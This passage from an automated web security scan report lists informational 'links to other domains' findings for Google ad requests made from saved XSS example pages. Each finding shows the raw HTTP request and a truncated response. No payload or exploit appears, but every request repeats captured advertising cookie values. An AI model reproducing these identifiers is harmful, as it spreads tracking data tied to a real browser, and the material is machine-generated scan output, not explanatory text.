Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:59:56 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 7124

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/bostonherald.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DAutoTrader.com%26adT%3DNewspaper%26adU%3Dwww.bp.com%26adT%3DBP%2526%252339%253Bs%2BWork%2Bin%2Bthe%2BGulf%26adU%3DMastersinLaw.TJSL.edu%26adT%3DThomas%2BJefferson%2BLaw%26gl%3DUS&amp;usg=AFQjCNHASrd2VzZwGa2zk51SVYi_wt--2w" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
19.26. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766894&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcapitalone.com.html&dt=1301748894928&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301748894941&frm=0&adk=1607234649&ga_vid=1572829511.1301748895&ga_sid=1301748895&ga_hid=2001588798&ga_fc=0&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=19&xpc=Ax6IEkS3xE&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:54:18 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12154

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/capitalone.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.CapitalOne.com%26adT%3DCapital%2BOne%25C2%25AE%2BCredit%2BCard%26adU%3Dwww.CreditCards.com%26adT%3DApply%2BFor%2BA%2BCredit%2BCard%26adU%3Dwww.CreditCardGuide.com%26adT%3DGet%2BA%2BVisa%2BCredit%2BCard%26gl%3DUS&amp;usg=AFQjCNEk9wsU5RiO4EKd9Zl5A5MNRIc-qw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.27. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998815&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fbroadband.espn.go.com.html&dt=1301749256008&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749256019&frm=0&adk=1607234649&ga_vid=646082387.1301749256&ga_sid=1301749256&ga_hid=1790351584&ga_fc=0&u_tz=-300&u_his=39&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=diNPn6jftu&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 13:00:20 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12098

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/broadband.espn.go.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DLocalXpress.com%26adT%3DBroadband%2BInternet%26adU%3DTopicologist.com%26adT%3D%25249/Mo%2BWireless%2BBroadband%26adU%3DCableOneAuthorizedOffers.com%26adT%3DCableOne%2BOffers%26gl%3DUS&amp;usg=AFQjCNH1EELYB0AkBHgxLIX7SYoXgxMOOA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.28. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767225&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fbostonherald.com.html&dt=1301749225844&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301749225857&frm=0&adk=1607234649&ga_vid=765306459.1301749226&ga_sid=1301749226&ga_hid=1991501193&ga_fc=0&u_tz=-300&u_his=36&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=17&xpc=DX3fYrOiHZ&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:59:49 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4268

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/bostonherald.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhilips.LifelineSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNG7Xkxz4Q78CO7GEN1DGO-VlDSYLQ" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
19.29. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1300998820&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Fhtml%2Fcapec-86-xss.flowplayer.org.html&dt=1301748848600&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301748848607&frm=0&adk=1607234649&ga_vid=807912304.1301748849&ga_sid=1301748849&ga_hid=86418383&ga_fc=0&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=12&xpc=VMlqWg7Beh&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:53:32 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12332

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/examples/html/capec-86-xss.flowplayer.org.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.akamai.com/StateofTheInternet%26adT%3DDenial%2BOf%2BService%2BAttacks%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26gl%3DUS&amp;usg=AFQjCNHVMaKNuBuLqHSHKadZcIeUzYWaww" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.30. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766923&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcaptavi.com.xss-cross-site-scripting.html&dt=1301748923897&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748923902&frm=0&adk=1607234649&ga_vid=659960906.1301748924&ga_sid=1301748924&ga_hid=790357082&ga_fc=0&u_tz=-300&u_his=12&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=13&xpc=VkCa5B0XKN&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:54:47 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12373

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/captavi.com.xss-cross-site-scripting.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3Dwww.symantec.com/pgp%26adT%3DSymantec%2BCommand%2BLine%26adU%3Dvulnerability.scan.qualys.com%26adT%3DOnline%2BVulnerability%2BScan%26gl%3DUS&amp;usg=AFQjCNGVrDJGMTA_Sq_04tReG32pDakoGA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
19.31. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767086&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcapec-86-xss-cross-site-scripting-dork-example-poc.html&dt=1301749086707&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301749086718&frm=0&adk=1607234649&ga_vid=436285111.1301749087&ga_sid=1301749087&ga_hid=392169975&ga_fc=0&u_tz=-300&u_his=24&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=17&xpc=sAHbAJuNT9&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:57:30 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4376

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/capec-86-xss-cross-site-scripting-dork-example-poc.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhilips.LifelineSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHpTPSA9tFARWaQV6O8UdzDGeuitw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
19.32. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301766955&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcareers.redhat.com.html&dt=1301748955253&bpp=3&shv=r20110324&jsv=r20110321-2&correlator=1301748955264&frm=0&adk=1607234649&ga_vid=252168462.1301748955&ga_sid=1301748955&ga_hid=97544560&ga_fc=0&u_tz=-300&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=16&xpc=Wt08AHuOaP&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:55:19 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4273

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/careers.redhat.com.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DPhilips.LifelineSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFMLPXFDt58eTwNfw3PyKRGwimdTw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
19.33. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301767038&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fcapec-86-dork-xss-cross-site-scripting-examples.html&dt=1301749038337&bpp=4&shv=r20110324&jsv=r20110321-2&correlator=1301749038350&frm=0&adk=1607234649&ga_vid=1619082733.1301749038&ga_sid=1301749038&ga_hid=1473851727&ga_fc=0&u_tz=-300&u_his=20&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=998&bih=1004&fu=0&ifi=1&dtd=24&xpc=PdISGmTx4Q&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|2305757/776973/15064,998766/320821/15055,1831140/746237/15055,2818894/957634/15036|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:56:42 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12401

